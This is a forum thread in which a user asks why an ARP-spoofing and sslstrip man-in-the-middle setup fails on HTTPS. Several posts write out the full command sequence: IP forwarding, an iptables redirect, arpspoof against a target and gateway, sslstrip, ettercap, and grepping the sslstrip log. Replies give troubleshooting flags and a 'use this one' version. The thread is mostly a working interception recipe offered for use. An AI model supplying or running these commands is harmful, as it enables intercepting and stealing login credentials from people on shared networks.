Results 1 to 5 of 5

Thread: Sniff SSL

  1. #1
    Just burned his ISO
    Join Date
    Sep 2009
    Posts
    3

    Default Sniff SSL

    HW Config:
    #Wifi Link 5300 (Network Interface: wlan0)

    SW Config:
    BackTrack 4 Pre Final that include:
    ettercap 0.7.3
    arpspoof
    sslstrip (I used the v0.4)
    .....(openssl)

    I followed the following steps:

    0 - Start BT 4 Pre Final (ok)

    1 - For HTTPS you need to uncomment the right 'redir' command in etter.conf (ok)

    2 - echo 1 > /proc/sys/net/ipv4/ip_forward (ok)

    3 - iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (ok)

    4 - arpspoof -i wlan0 -t <IP Target> <Gateway Target> (ok)

    5 - sudo python2.5 sslstrip.py -a -l 10000 (ok)

    6 - ettercap -T -q -i wlan0 (ok)

    http works, but https is as if it ignores.
    Then I repeated the steps to see if connecting to an https site, I would show the certificate warning dialog

    0 - Start BT 4 Pre Final (ok)
    1 - For HTTPS you need to uncomment the right 'redir' command in etter.conf (ok)
    2 - echo 1 > /proc/sys/net/ipv4/ip_forward (ok)
    3 - iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (ok)
    4 - arpspoof -i wlan0 -t <IP Target> <Gateway Target> (ok)
    5 - ettercap -T -q -i wlan0 (ok)

    but nothing shows me no warning and the connection is encrypted.

    Where did I go wrong?

  2. #2
    My life is this forum Snayler's Avatar
    Join Date
    Jan 2010
    Posts
    1,418

    Default

    Quote Originally Posted by Joseph69 View Post
    HW Config:
    #Wifi Link 5300 (Network Interface: wlan0)

    SW Config:
    BackTrack 4 Pre Final that include:
    ettercap 0.7.3
    arpspoof
    sslstrip (I used the v0.4)
    .....(openssl)

    I followed the following steps:

    0 - Start BT 4 Pre Final (ok)

    1 - For HTTPS you need to uncomment the right 'redir' command in etter.conf (ok)

    2 - echo 1 > /proc/sys/net/ipv4/ip_forward (ok)

    3 - iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (ok)

    4 - arpspoof -i wlan0 -t <IP Target> <Gateway Target> (ok)

    5 - sudo python2.5 sslstrip.py -a -l 10000 (ok)

    6 - ettercap -T -q -i wlan0 (ok)

    http works, but https is as if it ignores.
    Then I repeated the steps to see if connecting to an https site, I would show the certificate warning dialog

    0 - Start BT 4 Pre Final (ok)
    1 - For HTTPS you need to uncomment the right 'redir' command in etter.conf (ok)
    2 - echo 1 > /proc/sys/net/ipv4/ip_forward (ok)
    3 - iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 (ok)
    4 - arpspoof -i wlan0 -t <IP Target> <Gateway Target> (ok)
    5 - ettercap -T -q -i wlan0 (ok)

    but nothing shows me no warning and the connection is encrypted.

    Where did I go wrong?
    First, try
    Code:
    sslstrip -a -k -f
    instead of what you used.

    Secondly, try to use ettercap's arp poison capabilities, instead of arpspoof. Maybe that helps.

  3. #3
    Just burned his ISO
    Join Date
    Sep 2009
    Posts
    3

    Default

    I tried them all including the command "sslstrip-a-k-f" I have also seen the video of g0tm1lk.

    However, from the various tests that I did with ettercap (included in BT4) without sslstrip, as rule I should see the dialog box when I visit a site with https protocol and yet it is not there, so I think the problem is really them

  4. #4
    Just burned his ISO
    Join Date
    Sep 2009
    Posts
    3

    Default

    nothing. I think is something bound to ettercap because when I sniff with ettercap without sslstrip should see the certificate warning dialog instead nothing shows but http protocol works fine

  5. #5

    Default

    Code:
    echo "1" > /proc/sys/net/ipv4/ip_forward
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
    arpspoof -i wlan0 -t [Gateway] [Gateway]
    python ./sslstrip.py -a -l 8080
    cat sslstrip.log | grep
    Use this one!

    They work
    (hope so )
    mfg Reeth
    www.myownremote.blogspot.com

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •